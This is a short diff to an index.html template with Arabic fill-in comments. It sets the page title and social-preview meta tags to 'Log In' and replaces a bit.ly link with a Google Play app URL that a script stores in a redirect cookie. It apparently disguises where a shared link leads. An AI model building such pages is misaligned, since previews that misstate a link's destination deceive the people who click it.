--- a/index.html
+++ b/index.html
@@ -14,9 +14,9 @@
 
   <!-- ضع العنوان الخاص بك هنا  -->
   <title> Log In </title> 
-  <meta name="title" content="غير هذا النص">
-  <meta property="twitter:title" content="غير هذا النص"> 
-  <meta property="og:title" content="غير هذا النص">
+  <meta name="title" content="Log in">
+  <meta property="twitter:title" content="Log In"> 
+  <meta property="og:title" content="Log In">
 
 
   <!-- ضع الوصف الخاص بك هنا  -->
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://bit.ly/30JUK9F"; // أدخل الرابط الخاص بك هنا 
+    const URL = "https://play.google.com/store/apps/details?id=com.androdlab.multi.color.forfacebook2018"; // أدخل الرابط الخاص بك هنا 
 
     document.cookie = `rURL=${URL}`;
 
